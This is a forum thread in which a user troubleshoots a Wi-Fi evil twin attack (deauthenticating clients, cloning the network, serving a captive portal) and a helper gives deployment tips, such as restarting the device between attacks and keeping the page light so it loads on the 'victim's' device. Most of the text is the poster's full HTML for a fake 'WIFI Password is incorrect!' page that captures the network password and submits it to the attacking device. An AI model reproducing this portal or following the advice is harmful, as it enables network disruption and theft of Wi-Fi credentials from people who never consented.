Wifi attack deauth>clone>verify
Good day to all, so i was just trying to deauther my own wifi network to try the evil twin attack. But whenever I connect to the clone wifi, it doesn't show the custom html or anything. It just connects to it and doesn't do anything. Am i doing something wrong? Sometimes it just say obtaining ip on my device
Hello, you need to go to Config and find Restart.
This update does indeed have a bug where the firmware can't perform a normal attack twice. It simply disconnects clients from the network but doesn't open the clone portal, so after each attack, you need to restart the device via Config.
Your issue is specific to the device itself. If you have an iPhone, if you go to the access point settings, you'll see "Auto Login," which is what allows the clone portal to appear.
Auto Login can also be disabled if you attack the network more than once.
I've tried it on multiple device but still not working. I've also tried reformating the device and also the sd card. I've also tried reflashing the bruce but still has no show. Hope this issue gets fix on the next update.
If you can, send the code of a custom html file or a link to it.
I'll tell you in advance, the images need to be stored in the html file itself in base64 format.
Also, make sure that it is not large because it will take a long time to load + if the device that distributes the access point is still far from the victim, then due to a weak signal, it can also take a long time to load.
Here is the code of the html that i made. It's a very simple one. There's no image or anything that complicated or anything
Connect to Your Wi-Fi
Enter the network password to continue.
I accidentally close it..
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>WIFI | Password is incorrect!</title>
<style>
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background-color: #ffffff; /* Cinza mais escuro */
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
padding: 10px;
box-sizing: border-box;
}
.container {
padding: 20px;
text-align: center;
max-width: 360px;
width: 100%;
}
.container svg {
width: 70px;
height: 70px;
fill: #ff1744; /* Cor de alerta */
margin-bottom: 20px;
}
h1 {
color: #333;
font-size: 22px;
margin-bottom: 15px;
}
p {
color: #666;
font-size: 15px;
margin-bottom: 20px;
}
input[type="password"] {
width: 100%;
padding: 12px;
margin: 10px 0;
border-radius: 5px;
border: 1px solid #ccc;
font-size: 16px;
box-sizing: border-box;
}
button {
width: 100%;
padding: 12px;
background-color: #1878ff;
color: white;
border: none;
border-radius: 5px;
cursor: pointer;
font-size: 16px;
transition: background-color 0.3s;
}
button:hover {
background-color: #0056b3;
}
div#success-block{
display: none;
text-align: center;
min-height: 60px;
margin-bottom: 30px;
justify-content: center;
align-items: center;
}
/* Loading animation */
.loader {
border: 3px solid #ffffff00;
border-top: 3px solid #ffffff;
border-radius: 50%;
width: 20px;
height: 20px;
animation: spin 0.5s linear infinite;
margin: 0px auto;
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
</style>
</head>
<body>
<div class="container">
<!-- Ícone No Signal em SVG -->
<svg xmlns="http://www.w3.org/2000/svg" fill="#000000" width="800px" height="800px" viewBox="0 -1 26 26">
<path fill-opacity=".3" d="M24.24 8l1.35-1.68C25.1 5.96 20.26 2 13 2S.9 5.96.42 6.32l12.57 15.66.01.02.01-.01L20 13.28V8h4.24z"></path>
<path d="M22 22h2v-2h-2v2zm0-12v8h2v-8h-2z"></path>
</svg>
<h1>WIFI Password is incorrect!</h1>
<div id='form-block'>
<p>Please repeat your password.</p>
<form id='submit-form' action="/post">
<input type="password" name="password" placeholder="Wi-Fi Password" required>
<button type="submit">
<div class="loader" id="button-loader" style="display: none;"></div>
<span id="button-text">Continue</span>
</button>
</form>
</div>
</div>
<script>
document.getElementById('submit-form').addEventListener('submit', function(event) {
document.getElementById('button-text').style.display = 'none';
document.getElementById('button-loader').style.display = 'block';
});
</script>
</body>
</html>
You wrote the code incorrectly. I've created a file for you. Add this code to it and name it something like wifi.html. Then transfer it to the device and repeat the attack.
Ok. I'll try this. Thanks for helping me. I'll update you again on this thread if something came up.